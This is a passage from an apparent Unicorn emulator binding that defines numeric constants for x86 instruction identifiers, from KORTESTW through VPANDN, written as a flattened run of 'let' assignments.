let UC_X86_INS_KORTESTW = 299 + let UC_X86_INS_KORW = 300 + let UC_X86_INS_KSHIFTLB = 301 + let UC_X86_INS_KSHIFTLD = 302 + let UC_X86_INS_KSHIFTLQ = 303 + let UC_X86_INS_KSHIFTLW = 304 + let UC_X86_INS_KSHIFTRB = 305 + let UC_X86_INS_KSHIFTRD = 306 + let UC_X86_INS_KSHIFTRQ = 307 + let UC_X86_INS_KSHIFTRW = 308 + let UC_X86_INS_KUNPCKBW = 309 + let UC_X86_INS_KXNORB = 310 + let UC_X86_INS_KXNORD = 311 + let UC_X86_INS_KXNORQ = 312 + let UC_X86_INS_KXNORW = 313 + let UC_X86_INS_KXORB = 314 + let UC_X86_INS_KXORD = 315 + let UC_X86_INS_KXORQ = 316 + let UC_X86_INS_KXORW = 317 + let UC_X86_INS_LAHF = 318 + let UC_X86_INS_LAR = 319 + let UC_X86_INS_LDDQU = 320 + let UC_X86_INS_LDMXCSR = 321 + let UC_X86_INS_LDS = 322 + let UC_X86_INS_FLDZ = 323 + let UC_X86_INS_FLD1 = 324 + let UC_X86_INS_FLD = 325 + let UC_X86_INS_LEA = 326 + let UC_X86_INS_LEAVE = 327 + let UC_X86_INS_LES = 328 + let UC_X86_INS_LFENCE = 329 + let UC_X86_INS_LFS = 330 + let UC_X86_INS_LGDT = 331 + let UC_X86_INS_LGS = 332 + let UC_X86_INS_LIDT = 333 + let UC_X86_INS_LLDT = 334 + let UC_X86_INS_LMSW = 335 + let UC_X86_INS_OR = 336 + let UC_X86_INS_SUB = 337 + let UC_X86_INS_XOR = 338 + let UC_X86_INS_LODSB = 339 + let UC_X86_INS_LODSD = 340 + let UC_X86_INS_LODSQ = 341 + let UC_X86_INS_LODSW = 342 + let UC_X86_INS_LOOP = 343 + let UC_X86_INS_LOOPE = 344 + let UC_X86_INS_LOOPNE = 345 + let UC_X86_INS_RETF = 346 + let UC_X86_INS_RETFQ = 347 + let UC_X86_INS_LSL = 348 + let UC_X86_INS_LSS = 349 + let UC_X86_INS_LTR = 350 + let UC_X86_INS_XADD = 351 + let UC_X86_INS_LZCNT = 352 + let UC_X86_INS_MASKMOVDQU = 353 + let UC_X86_INS_MAXPD = 354 + let UC_X86_INS_MAXPS = 355 + let UC_X86_INS_MAXSD = 356 + let UC_X86_INS_MAXSS = 357 + let UC_X86_INS_MFENCE = 358 + let UC_X86_INS_MINPD = 359 + let UC_X86_INS_MINPS = 360 + let UC_X86_INS_MINSD = 361 + let UC_X86_INS_MINSS = 362 + let UC_X86_INS_CVTPD2PI = 363 + let UC_X86_INS_CVTPI2PD = 364 + let UC_X86_INS_CVTPI2PS = 365 + let UC_X86_INS_CVTPS2PI = 366 + let UC_X86_INS_CVTTPD2PI = 367 + let UC_X86_INS_CVTTPS2PI = 368 + let UC_X86_INS_EMMS = 369 + let UC_X86_INS_MASKMOVQ = 370 + let UC_X86_INS_MOVD = 371 + let UC_X86_INS_MOVDQ2Q = 372 + let UC_X86_INS_MOVNTQ = 373 + let UC_X86_INS_MOVQ2DQ = 374 + let UC_X86_INS_MOVQ = 375 + let UC_X86_INS_PABSB = 376 + let UC_X86_INS_PABSD = 377 + let UC_X86_INS_PABSW = 378 + let UC_X86_INS_PACKSSDW = 379 + let UC_X86_INS_PACKSSWB = 380 + let UC_X86_INS_PACKUSWB = 381 + let UC_X86_INS_PADDB = 382 + let UC_X86_INS_PADDD = 383 + let UC_X86_INS_PADDQ = 384 + let UC_X86_INS_PADDSB = 385 + let UC_X86_INS_PADDSW = 386 + let UC_X86_INS_PADDUSB = 387 + let UC_X86_INS_PADDUSW = 388 + let UC_X86_INS_PADDW = 389 + let UC_X86_INS_PALIGNR = 390 + let UC_X86_INS_PANDN = 391 + let UC_X86_INS_PAND = 392 + let UC_X86_INS_PAVGB = 393 + let UC_X86_INS_PAVGW = 394 + let UC_X86_INS_PCMPEQB = 395 + let UC_X86_INS_PCMPEQD = 396 + let UC_X86_INS_PCMPEQW = 397 + let UC_X86_INS_PCMPGTB = 398 + let UC_X86_INS_PCMPGTD = 399 + let UC_X86_INS_PCMPGTW = 400 + let UC_X86_INS_PEXTRW = 401 + let UC_X86_INS_PHADDSW = 402 + let UC_X86_INS_PHADDW = 403 + let UC_X86_INS_PHADDD = 404 + let UC_X86_INS_PHSUBD = 405 + let UC_X86_INS_PHSUBSW = 406 + let UC_X86_INS_PHSUBW = 407 + let UC_X86_INS_PINSRW = 408 + let UC_X86_INS_PMADDUBSW = 409 + let UC_X86_INS_PMADDWD = 410 + let UC_X86_INS_PMAXSW = 411 + let UC_X86_INS_PMAXUB = 412 + let UC_X86_INS_PMINSW = 413 + let UC_X86_INS_PMINUB = 414 + let UC_X86_INS_PMOVMSKB = 415 + let UC_X86_INS_PMULHRSW = 416 + let UC_X86_INS_PMULHUW = 417 + let UC_X86_INS_PMULHW = 418 + let UC_X86_INS_PMULLW = 419 + let UC_X86_INS_PMULUDQ = 420 + let UC_X86_INS_POR = 421 + let UC_X86_INS_PSADBW = 422 + let UC_X86_INS_PSHUFB = 423 + let UC_X86_INS_PSHUFW = 424 + let UC_X86_INS_PSIGNB = 425 + let UC_X86_INS_PSIGND = 426 + let UC_X86_INS_PSIGNW = 427 + let UC_X86_INS_PSLLD = 428 + let UC_X86_INS_PSLLQ = 429 + let UC_X86_INS_PSLLW = 430 + let UC_X86_INS_PSRAD = 431 + let UC_X86_INS_PSRAW = 432 + let UC_X86_INS_PSRLD = 433 + let UC_X86_INS_PSRLQ = 434 + let UC_X86_INS_PSRLW = 435 + let UC_X86_INS_PSUBB = 436 + let UC_X86_INS_PSUBD = 437 + let UC_X86_INS_PSUBQ = 438 + let UC_X86_INS_PSUBSB = 439 + let UC_X86_INS_PSUBSW = 440 + let UC_X86_INS_PSUBUSB = 441 + let UC_X86_INS_PSUBUSW = 442 + let UC_X86_INS_PSUBW = 443 + let UC_X86_INS_PUNPCKHBW = 444 + let UC_X86_INS_PUNPCKHDQ = 445 + let UC_X86_INS_PUNPCKHWD = 446 + let UC_X86_INS_PUNPCKLBW = 447 + let UC_X86_INS_PUNPCKLDQ = 448 + let UC_X86_INS_PUNPCKLWD = 449 + let UC_X86_INS_PXOR = 450 + let UC_X86_INS_MONITOR = 451 + let UC_X86_INS_MONTMUL = 452 + let UC_X86_INS_MOV = 453 + let UC_X86_INS_MOVABS = 454 + let UC_X86_INS_MOVBE = 455 + let UC_X86_INS_MOVDDUP = 456 + let UC_X86_INS_MOVDQA = 457 + let UC_X86_INS_MOVDQU = 458 + let UC_X86_INS_MOVHLPS = 459 + let UC_X86_INS_MOVHPD = 460 + let UC_X86_INS_MOVHPS = 461 + let UC_X86_INS_MOVLHPS = 462 + let UC_X86_INS_MOVLPD = 463 + let UC_X86_INS_MOVLPS = 464 + let UC_X86_INS_MOVMSKPD = 465 + let UC_X86_INS_MOVMSKPS = 466 + let UC_X86_INS_MOVNTDQA = 467 + let UC_X86_INS_MOVNTDQ = 468 + let UC_X86_INS_MOVNTI = 469 + let UC_X86_INS_MOVNTPD = 470 + let UC_X86_INS_MOVNTPS = 471 + let UC_X86_INS_MOVNTSD = 472 + let UC_X86_INS_MOVNTSS = 473 + let UC_X86_INS_MOVSB = 474 + let UC_X86_INS_MOVSD = 475 + let UC_X86_INS_MOVSHDUP = 476 + let UC_X86_INS_MOVSLDUP = 477 + let UC_X86_INS_MOVSQ = 478 + let UC_X86_INS_MOVSS = 479 + let UC_X86_INS_MOVSW = 480 + let UC_X86_INS_MOVSX = 481 + let UC_X86_INS_MOVSXD = 482 + let UC_X86_INS_MOVUPD = 483 + let UC_X86_INS_MOVUPS = 484 + let UC_X86_INS_MOVZX = 485 + let UC_X86_INS_MPSADBW = 486 + let UC_X86_INS_MUL = 487 + let UC_X86_INS_MULPD = 488 + let UC_X86_INS_MULPS = 489 + let UC_X86_INS_MULSD = 490 + let UC_X86_INS_MULSS = 491 + let UC_X86_INS_MULX = 492 + let UC_X86_INS_FMUL = 493 + let UC_X86_INS_FIMUL = 494 + let UC_X86_INS_FMULP = 495 + let UC_X86_INS_MWAIT = 496 + let UC_X86_INS_NEG = 497 + let UC_X86_INS_NOP = 498 + let UC_X86_INS_NOT = 499 + let UC_X86_INS_OUT = 500 + let UC_X86_INS_OUTSB = 501 + let UC_X86_INS_OUTSD = 502 + let UC_X86_INS_OUTSW = 503 + let UC_X86_INS_PACKUSDW = 504 + let UC_X86_INS_PAUSE = 505 + let UC_X86_INS_PAVGUSB = 506 + let UC_X86_INS_PBLENDVB = 507 + let UC_X86_INS_PBLENDW = 508 + let UC_X86_INS_PCLMULQDQ = 509 + let UC_X86_INS_PCMPEQQ = 510 + let UC_X86_INS_PCMPESTRI = 511 + let UC_X86_INS_PCMPESTRM = 512 + let UC_X86_INS_PCMPGTQ = 513 + let UC_X86_INS_PCMPISTRI = 514 + let UC_X86_INS_PCMPISTRM = 515 + let UC_X86_INS_PCOMMIT = 516 + let UC_X86_INS_PDEP = 517 + let UC_X86_INS_PEXT = 518 + let UC_X86_INS_PEXTRB = 519 + let UC_X86_INS_PEXTRD = 520 + let UC_X86_INS_PEXTRQ = 521 + let UC_X86_INS_PF2ID = 522 + let UC_X86_INS_PF2IW = 523 + let UC_X86_INS_PFACC = 524 + let UC_X86_INS_PFADD = 525 + let UC_X86_INS_PFCMPEQ = 526 + let UC_X86_INS_PFCMPGE = 527 + let UC_X86_INS_PFCMPGT = 528 + let UC_X86_INS_PFMAX = 529 + let UC_X86_INS_PFMIN = 530 + let UC_X86_INS_PFMUL = 531 + let UC_X86_INS_PFNACC = 532 + let UC_X86_INS_PFPNACC = 533 + let UC_X86_INS_PFRCPIT1 = 534 + let UC_X86_INS_PFRCPIT2 = 535 + let UC_X86_INS_PFRCP = 536 + let UC_X86_INS_PFRSQIT1 = 537 + let UC_X86_INS_PFRSQRT = 538 + let UC_X86_INS_PFSUBR = 539 + let UC_X86_INS_PFSUB = 540 + let UC_X86_INS_PHMINPOSUW = 541 + let UC_X86_INS_PI2FD = 542 + let UC_X86_INS_PI2FW = 543 + let UC_X86_INS_PINSRB = 544 + let UC_X86_INS_PINSRD = 545 + let UC_X86_INS_PINSRQ = 546 + let UC_X86_INS_PMAXSB = 547 + let UC_X86_INS_PMAXSD = 548 + let UC_X86_INS_PMAXUD = 549 + let UC_X86_INS_PMAXUW = 550 + let UC_X86_INS_PMINSB = 551 + let UC_X86_INS_PMINSD = 552 + let UC_X86_INS_PMINUD = 553 + let UC_X86_INS_PMINUW = 554 + let UC_X86_INS_PMOVSXBD = 555 + let UC_X86_INS_PMOVSXBQ = 556 + let UC_X86_INS_PMOVSXBW = 557 + let UC_X86_INS_PMOVSXDQ = 558 + let UC_X86_INS_PMOVSXWD = 559 + let UC_X86_INS_PMOVSXWQ = 560 + let UC_X86_INS_PMOVZXBD = 561 + let UC_X86_INS_PMOVZXBQ = 562 + let UC_X86_INS_PMOVZXBW = 563 + let UC_X86_INS_PMOVZXDQ = 564 + let UC_X86_INS_PMOVZXWD = 565 + let UC_X86_INS_PMOVZXWQ = 566 + let UC_X86_INS_PMULDQ = 567 + let UC_X86_INS_PMULHRW = 568 + let UC_X86_INS_PMULLD = 569 + let UC_X86_INS_POP = 570 + let UC_X86_INS_POPAW = 571 + let UC_X86_INS_POPAL = 572 + let UC_X86_INS_POPCNT = 573 + let UC_X86_INS_POPF = 574 + let UC_X86_INS_POPFD = 575 + let UC_X86_INS_POPFQ = 576 + let UC_X86_INS_PREFETCH = 577 + let UC_X86_INS_PREFETCHNTA = 578 + let UC_X86_INS_PREFETCHT0 = 579 + let UC_X86_INS_PREFETCHT1 = 580 + let UC_X86_INS_PREFETCHT2 = 581 + let UC_X86_INS_PREFETCHW = 582 + let UC_X86_INS_PSHUFD = 583 + let UC_X86_INS_PSHUFHW = 584 + let UC_X86_INS_PSHUFLW = 585 + let UC_X86_INS_PSLLDQ = 586 + let UC_X86_INS_PSRLDQ = 587 + let UC_X86_INS_PSWAPD = 588 + let UC_X86_INS_PTEST = 589 + let UC_X86_INS_PUNPCKHQDQ = 590 + let UC_X86_INS_PUNPCKLQDQ = 591 + let UC_X86_INS_PUSH = 592 + let UC_X86_INS_PUSHAW = 593 + let UC_X86_INS_PUSHAL = 594 + let UC_X86_INS_PUSHF = 595 + let UC_X86_INS_PUSHFD = 596 + let UC_X86_INS_PUSHFQ = 597 + let UC_X86_INS_RCL = 598 + let UC_X86_INS_RCPPS = 599 + let UC_X86_INS_RCPSS = 600 + let UC_X86_INS_RCR = 601 + let UC_X86_INS_RDFSBASE = 602 + let UC_X86_INS_RDGSBASE = 603 + let UC_X86_INS_RDMSR = 604 + let UC_X86_INS_RDPMC = 605 + let UC_X86_INS_RDRAND = 606 + let UC_X86_INS_RDSEED = 607 + let UC_X86_INS_RDTSC = 608 + let UC_X86_INS_RDTSCP = 609 + let UC_X86_INS_ROL = 610 + let UC_X86_INS_ROR = 611 + let UC_X86_INS_RORX = 612 + let UC_X86_INS_ROUNDPD = 613 + let UC_X86_INS_ROUNDPS = 614 + let UC_X86_INS_ROUNDSD = 615 + let UC_X86_INS_ROUNDSS = 616 + let UC_X86_INS_RSM = 617 + let UC_X86_INS_RSQRTPS = 618 + let UC_X86_INS_RSQRTSS = 619 + let UC_X86_INS_SAHF = 620 + let UC_X86_INS_SAL = 621 + let UC_X86_INS_SALC = 622 + let UC_X86_INS_SAR = 623 + let UC_X86_INS_SARX = 624 + let UC_X86_INS_SBB = 625 + let UC_X86_INS_SCASB = 626 + let UC_X86_INS_SCASD = 627 + let UC_X86_INS_SCASQ = 628 + let UC_X86_INS_SCASW = 629 + let UC_X86_INS_SETAE = 630 + let UC_X86_INS_SETA = 631 + let UC_X86_INS_SETBE = 632 + let UC_X86_INS_SETB = 633 + let UC_X86_INS_SETE = 634 + let UC_X86_INS_SETGE = 635 + let UC_X86_INS_SETG = 636 + let UC_X86_INS_SETLE = 637 + let UC_X86_INS_SETL = 638 + let UC_X86_INS_SETNE = 639 + let UC_X86_INS_SETNO = 640 + let UC_X86_INS_SETNP = 641 + let UC_X86_INS_SETNS = 642 + let UC_X86_INS_SETO = 643 + let UC_X86_INS_SETP = 644 + let UC_X86_INS_SETS = 645 + let UC_X86_INS_SFENCE = 646 + let UC_X86_INS_SGDT = 647 + let UC_X86_INS_SHA1MSG1 = 648 + let UC_X86_INS_SHA1MSG2 = 649 + let UC_X86_INS_SHA1NEXTE = 650 + let UC_X86_INS_SHA1RNDS4 = 651 + let UC_X86_INS_SHA256MSG1 = 652 + let UC_X86_INS_SHA256MSG2 = 653 + let UC_X86_INS_SHA256RNDS2 = 654 + let UC_X86_INS_SHL = 655 + let UC_X86_INS_SHLD = 656 + let UC_X86_INS_SHLX = 657 + let UC_X86_INS_SHR = 658 + let UC_X86_INS_SHRD = 659 + let UC_X86_INS_SHRX = 660 + let UC_X86_INS_SHUFPD = 661 + let UC_X86_INS_SHUFPS = 662 + let UC_X86_INS_SIDT = 663 + let UC_X86_INS_FSIN = 664 + let UC_X86_INS_SKINIT = 665 + let UC_X86_INS_SLDT = 666 + let UC_X86_INS_SMSW = 667 + let UC_X86_INS_SQRTPD = 668 + let UC_X86_INS_SQRTPS = 669 + let UC_X86_INS_SQRTSD = 670 + let UC_X86_INS_SQRTSS = 671 + let UC_X86_INS_FSQRT = 672 + let UC_X86_INS_STAC = 673 + let UC_X86_INS_STC = 674 + let UC_X86_INS_STD = 675 + let UC_X86_INS_STGI = 676 + let UC_X86_INS_STI = 677 + let UC_X86_INS_STMXCSR = 678 + let UC_X86_INS_STOSB = 679 + let UC_X86_INS_STOSD = 680 + let UC_X86_INS_STOSQ = 681 + let UC_X86_INS_STOSW = 682 + let UC_X86_INS_STR = 683 + let UC_X86_INS_FST = 684 + let UC_X86_INS_FSTP = 685 + let UC_X86_INS_FSTPNCE = 686 + let UC_X86_INS_FXCH = 687 + let UC_X86_INS_SUBPD = 688 + let UC_X86_INS_SUBPS = 689 + let UC_X86_INS_FSUBR = 690 + let UC_X86_INS_FISUBR = 691 + let UC_X86_INS_FSUBRP = 692 + let UC_X86_INS_SUBSD = 693 + let UC_X86_INS_SUBSS = 694 + let UC_X86_INS_FSUB = 695 + let UC_X86_INS_FISUB = 696 + let UC_X86_INS_FSUBP = 697 + let UC_X86_INS_SWAPGS = 698 + let UC_X86_INS_SYSCALL = 699 + let UC_X86_INS_SYSENTER = 700 + let UC_X86_INS_SYSEXIT = 701 + let UC_X86_INS_SYSRET = 702 + let UC_X86_INS_T1MSKC = 703 + let UC_X86_INS_TEST = 704 + let UC_X86_INS_UD2 = 705 + let UC_X86_INS_FTST = 706 + let UC_X86_INS_TZCNT = 707 + let UC_X86_INS_TZMSK = 708 + let UC_X86_INS_FUCOMPI = 709 + let UC_X86_INS_FUCOMI = 710 + let UC_X86_INS_FUCOMPP = 711 + let UC_X86_INS_FUCOMP = 712 + let UC_X86_INS_FUCOM = 713 + let UC_X86_INS_UD2B = 714 + let UC_X86_INS_UNPCKHPD = 715 + let UC_X86_INS_UNPCKHPS = 716 + let UC_X86_INS_UNPCKLPD = 717 + let UC_X86_INS_UNPCKLPS = 718 + let UC_X86_INS_VADDPD = 719 + let UC_X86_INS_VADDPS = 720 + let UC_X86_INS_VADDSD = 721 + let UC_X86_INS_VADDSS = 722 + let UC_X86_INS_VADDSUBPD = 723 + let UC_X86_INS_VADDSUBPS = 724 + let UC_X86_INS_VAESDECLAST = 725 + let UC_X86_INS_VAESDEC = 726 + let UC_X86_INS_VAESENCLAST = 727 + let UC_X86_INS_VAESENC = 728 + let UC_X86_INS_VAESIMC = 729 + let UC_X86_INS_VAESKEYGENASSIST = 730 + let UC_X86_INS_VALIGND = 731 + let UC_X86_INS_VALIGNQ = 732 + let UC_X86_INS_VANDNPD = 733 + let UC_X86_INS_VANDNPS = 734 + let UC_X86_INS_VANDPD = 735 + let UC_X86_INS_VANDPS = 736 + let UC_X86_INS_VBLENDMPD = 737 + let UC_X86_INS_VBLENDMPS = 738 + let UC_X86_INS_VBLENDPD = 739 + let UC_X86_INS_VBLENDPS = 740 + let UC_X86_INS_VBLENDVPD = 741 + let UC_X86_INS_VBLENDVPS = 742 + let UC_X86_INS_VBROADCASTF128 = 743 + let UC_X86_INS_VBROADCASTI32X4 = 744 + let UC_X86_INS_VBROADCASTI64X4 = 745 + let UC_X86_INS_VBROADCASTSD = 746 + let UC_X86_INS_VBROADCASTSS = 747 + let UC_X86_INS_VCMPPD = 748 + let UC_X86_INS_VCMPPS = 749 + let UC_X86_INS_VCMPSD = 750 + let UC_X86_INS_VCMPSS = 751 + let UC_X86_INS_VCOMPRESSPD = 752 + let UC_X86_INS_VCOMPRESSPS = 753 + let UC_X86_INS_VCVTDQ2PD = 754 + let UC_X86_INS_VCVTDQ2PS = 755 + let UC_X86_INS_VCVTPD2DQX = 756 + let UC_X86_INS_VCVTPD2DQ = 757 + let UC_X86_INS_VCVTPD2PSX = 758 + let UC_X86_INS_VCVTPD2PS = 759 + let UC_X86_INS_VCVTPD2UDQ = 760 + let UC_X86_INS_VCVTPH2PS = 761 + let UC_X86_INS_VCVTPS2DQ = 762 + let UC_X86_INS_VCVTPS2PD = 763 + let UC_X86_INS_VCVTPS2PH = 764 + let UC_X86_INS_VCVTPS2UDQ = 765 + let UC_X86_INS_VCVTSD2SI = 766 + let UC_X86_INS_VCVTSD2USI = 767 + let UC_X86_INS_VCVTSS2SI = 768 + let UC_X86_INS_VCVTSS2USI = 769 + let UC_X86_INS_VCVTTPD2DQX = 770 + let UC_X86_INS_VCVTTPD2DQ = 771 + let UC_X86_INS_VCVTTPD2UDQ = 772 + let UC_X86_INS_VCVTTPS2DQ = 773 + let UC_X86_INS_VCVTTPS2UDQ = 774 + let UC_X86_INS_VCVTUDQ2PD = 775 + let UC_X86_INS_VCVTUDQ2PS = 776 + let UC_X86_INS_VDIVPD = 777 + let UC_X86_INS_VDIVPS = 778 + let UC_X86_INS_VDIVSD = 779 + let UC_X86_INS_VDIVSS = 780 + let UC_X86_INS_VDPPD = 781 + let UC_X86_INS_VDPPS = 782 + let UC_X86_INS_VERR = 783 + let UC_X86_INS_VERW = 784 + let UC_X86_INS_VEXP2PD = 785 + let UC_X86_INS_VEXP2PS = 786 + let UC_X86_INS_VEXPANDPD = 787 + let UC_X86_INS_VEXPANDPS = 788 + let UC_X86_INS_VEXTRACTF128 = 789 + let UC_X86_INS_VEXTRACTF32X4 = 790 + let UC_X86_INS_VEXTRACTF64X4 = 791 + let UC_X86_INS_VEXTRACTI128 = 792 + let UC_X86_INS_VEXTRACTI32X4 = 793 + let UC_X86_INS_VEXTRACTI64X4 = 794 + let UC_X86_INS_VEXTRACTPS = 795 + let UC_X86_INS_VFMADD132PD = 796 + let UC_X86_INS_VFMADD132PS = 797 + let UC_X86_INS_VFMADDPD = 798 + let UC_X86_INS_VFMADD213PD = 799 + let UC_X86_INS_VFMADD231PD = 800 + let UC_X86_INS_VFMADDPS = 801 + let UC_X86_INS_VFMADD213PS = 802 + let UC_X86_INS_VFMADD231PS = 803 + let UC_X86_INS_VFMADDSD = 804 + let UC_X86_INS_VFMADD213SD = 805 + let UC_X86_INS_VFMADD132SD = 806 + let UC_X86_INS_VFMADD231SD = 807 + let UC_X86_INS_VFMADDSS = 808 + let UC_X86_INS_VFMADD213SS = 809 + let UC_X86_INS_VFMADD132SS = 810 + let UC_X86_INS_VFMADD231SS = 811 + let UC_X86_INS_VFMADDSUB132PD = 812 + let UC_X86_INS_VFMADDSUB132PS = 813 + let UC_X86_INS_VFMADDSUBPD = 814 + let UC_X86_INS_VFMADDSUB213PD = 815 + let UC_X86_INS_VFMADDSUB231PD = 816 + let UC_X86_INS_VFMADDSUBPS = 817 + let UC_X86_INS_VFMADDSUB213PS = 818 + let UC_X86_INS_VFMADDSUB231PS = 819 + let UC_X86_INS_VFMSUB132PD = 820 + let UC_X86_INS_VFMSUB132PS = 821 + let UC_X86_INS_VFMSUBADD132PD = 822 + let UC_X86_INS_VFMSUBADD132PS = 823 + let UC_X86_INS_VFMSUBADDPD = 824 + let UC_X86_INS_VFMSUBADD213PD = 825 + let UC_X86_INS_VFMSUBADD231PD = 826 + let UC_X86_INS_VFMSUBADDPS = 827 + let UC_X86_INS_VFMSUBADD213PS = 828 + let UC_X86_INS_VFMSUBADD231PS = 829 + let UC_X86_INS_VFMSUBPD = 830 + let UC_X86_INS_VFMSUB213PD = 831 + let UC_X86_INS_VFMSUB231PD = 832 + let UC_X86_INS_VFMSUBPS = 833 + let UC_X86_INS_VFMSUB213PS = 834 + let UC_X86_INS_VFMSUB231PS = 835 + let UC_X86_INS_VFMSUBSD = 836 + let UC_X86_INS_VFMSUB213SD = 837 + let UC_X86_INS_VFMSUB132SD = 838 + let UC_X86_INS_VFMSUB231SD = 839 + let UC_X86_INS_VFMSUBSS = 840 + let UC_X86_INS_VFMSUB213SS = 841 + let UC_X86_INS_VFMSUB132SS = 842 + let UC_X86_INS_VFMSUB231SS = 843 + let UC_X86_INS_VFNMADD132PD = 844 + let UC_X86_INS_VFNMADD132PS = 845 + let UC_X86_INS_VFNMADDPD = 846 + let UC_X86_INS_VFNMADD213PD = 847 + let UC_X86_INS_VFNMADD231PD = 848 + let UC_X86_INS_VFNMADDPS = 849 + let UC_X86_INS_VFNMADD213PS = 850 + let UC_X86_INS_VFNMADD231PS = 851 + let UC_X86_INS_VFNMADDSD = 852 + let UC_X86_INS_VFNMADD213SD = 853 + let UC_X86_INS_VFNMADD132SD = 854 + let UC_X86_INS_VFNMADD231SD = 855 + let UC_X86_INS_VFNMADDSS = 856 + let UC_X86_INS_VFNMADD213SS = 857 + let UC_X86_INS_VFNMADD132SS = 858 + let UC_X86_INS_VFNMADD231SS = 859 + let UC_X86_INS_VFNMSUB132PD = 860 + let UC_X86_INS_VFNMSUB132PS = 861 + let UC_X86_INS_VFNMSUBPD = 862 + let UC_X86_INS_VFNMSUB213PD = 863 + let UC_X86_INS_VFNMSUB231PD = 864 + let UC_X86_INS_VFNMSUBPS = 865 + let UC_X86_INS_VFNMSUB213PS = 866 + let UC_X86_INS_VFNMSUB231PS = 867 + let UC_X86_INS_VFNMSUBSD = 868 + let UC_X86_INS_VFNMSUB213SD = 869 + let UC_X86_INS_VFNMSUB132SD = 870 + let UC_X86_INS_VFNMSUB231SD = 871 + let UC_X86_INS_VFNMSUBSS = 872 + let UC_X86_INS_VFNMSUB213SS = 873 + let UC_X86_INS_VFNMSUB132SS = 874 + let UC_X86_INS_VFNMSUB231SS = 875 + let UC_X86_INS_VFRCZPD = 876 + let UC_X86_INS_VFRCZPS = 877 + let UC_X86_INS_VFRCZSD = 878 + let UC_X86_INS_VFRCZSS = 879 + let UC_X86_INS_VORPD = 880 + let UC_X86_INS_VORPS = 881 + let UC_X86_INS_VXORPD = 882 + let UC_X86_INS_VXORPS = 883 + let UC_X86_INS_VGATHERDPD = 884 + let UC_X86_INS_VGATHERDPS = 885 + let UC_X86_INS_VGATHERPF0DPD = 886 + let UC_X86_INS_VGATHERPF0DPS = 887 + let UC_X86_INS_VGATHERPF0QPD = 888 + let UC_X86_INS_VGATHERPF0QPS = 889 + let UC_X86_INS_VGATHERPF1DPD = 890 + let UC_X86_INS_VGATHERPF1DPS = 891 + let UC_X86_INS_VGATHERPF1QPD = 892 + let UC_X86_INS_VGATHERPF1QPS = 893 + let UC_X86_INS_VGATHERQPD = 894 + let UC_X86_INS_VGATHERQPS = 895 + let UC_X86_INS_VHADDPD = 896 + let UC_X86_INS_VHADDPS = 897 + let UC_X86_INS_VHSUBPD = 898 + let UC_X86_INS_VHSUBPS = 899 + let UC_X86_INS_VINSERTF128 = 900 + let UC_X86_INS_VINSERTF32X4 = 901 + let UC_X86_INS_VINSERTF32X8 = 902 + let UC_X86_INS_VINSERTF64X2 = 903 + let UC_X86_INS_VINSERTF64X4 = 904 + let UC_X86_INS_VINSERTI128 = 905 + let UC_X86_INS_VINSERTI32X4 = 906 + let UC_X86_INS_VINSERTI32X8 = 907 + let UC_X86_INS_VINSERTI64X2 = 908 + let UC_X86_INS_VINSERTI64X4 = 909 + let UC_X86_INS_VINSERTPS = 910 + let UC_X86_INS_VLDDQU = 911 + let UC_X86_INS_VLDMXCSR = 912 + let UC_X86_INS_VMASKMOVDQU = 913 + let UC_X86_INS_VMASKMOVPD = 914 + let UC_X86_INS_VMASKMOVPS = 915 + let UC_X86_INS_VMAXPD = 916 + let UC_X86_INS_VMAXPS = 917 + let UC_X86_INS_VMAXSD = 918 + let UC_X86_INS_VMAXSS = 919 + let UC_X86_INS_VMCALL = 920 + let UC_X86_INS_VMCLEAR = 921 + let UC_X86_INS_VMFUNC = 922 + let UC_X86_INS_VMINPD = 923 + let UC_X86_INS_VMINPS = 924 + let UC_X86_INS_VMINSD = 925 + let UC_X86_INS_VMINSS = 926 + let UC_X86_INS_VMLAUNCH = 927 + let UC_X86_INS_VMLOAD = 928 + let UC_X86_INS_VMMCALL = 929 + let UC_X86_INS_VMOVQ = 930 + let UC_X86_INS_VMOVDDUP = 931 + let UC_X86_INS_VMOVD = 932 + let UC_X86_INS_VMOVDQA32 = 933 + let UC_X86_INS_VMOVDQA64 = 934 + let UC_X86_INS_VMOVDQA = 935 + let UC_X86_INS_VMOVDQU16 = 936 + let UC_X86_INS_VMOVDQU32 = 937 + let UC_X86_INS_VMOVDQU64 = 938 + let UC_X86_INS_VMOVDQU8 = 939 + let UC_X86_INS_VMOVDQU = 940 + let UC_X86_INS_VMOVHLPS = 941 + let UC_X86_INS_VMOVHPD = 942 + let UC_X86_INS_VMOVHPS = 943 + let UC_X86_INS_VMOVLHPS = 944 + let UC_X86_INS_VMOVLPD = 945 + let UC_X86_INS_VMOVLPS = 946 + let UC_X86_INS_VMOVMSKPD = 947 + let UC_X86_INS_VMOVMSKPS = 948 + let UC_X86_INS_VMOVNTDQA = 949 + let UC_X86_INS_VMOVNTDQ = 950 + let UC_X86_INS_VMOVNTPD = 951 + let UC_X86_INS_VMOVNTPS = 952 + let UC_X86_INS_VMOVSD = 953 + let UC_X86_INS_VMOVSHDUP = 954 + let UC_X86_INS_VMOVSLDUP = 955 + let UC_X86_INS_VMOVSS = 956 + let UC_X86_INS_VMOVUPD = 957 + let UC_X86_INS_VMOVUPS = 958 + let UC_X86_INS_VMPSADBW = 959 + let UC_X86_INS_VMPTRLD = 960 + let UC_X86_INS_VMPTRST = 961 + let UC_X86_INS_VMREAD = 962 + let UC_X86_INS_VMRESUME = 963 + let UC_X86_INS_VMRUN = 964 + let UC_X86_INS_VMSAVE = 965 + let UC_X86_INS_VMULPD = 966 + let UC_X86_INS_VMULPS = 967 + let UC_X86_INS_VMULSD = 968 + let UC_X86_INS_VMULSS = 969 + let UC_X86_INS_VMWRITE = 970 + let UC_X86_INS_VMXOFF = 971 + let UC_X86_INS_VMXON = 972 + let UC_X86_INS_VPABSB = 973 + let UC_X86_INS_VPABSD = 974 + let UC_X86_INS_VPABSQ = 975 + let UC_X86_INS_VPABSW = 976 + let UC_X86_INS_VPACKSSDW = 977 + let UC_X86_INS_VPACKSSWB = 978 + let UC_X86_INS_VPACKUSDW = 979 + let UC_X86_INS_VPACKUSWB = 980 + let UC_X86_INS_VPADDB = 981 + let UC_X86_INS_VPADDD = 982 + let UC_X86_INS_VPADDQ = 983 + let UC_X86_INS_VPADDSB = 984 + let UC_X86_INS_VPADDSW = 985 + let UC_X86_INS_VPADDUSB = 986 + let UC_X86_INS_VPADDUSW = 987 + let UC_X86_INS_VPADDW = 988 + let UC_X86_INS_VPALIGNR = 989 + let UC_X86_INS_VPANDD = 990 + let UC_X86_INS_VPANDND = 991 + let UC_X86_INS_VPANDNQ = 992 + let UC_X86_INS_VPANDN = 993 + let 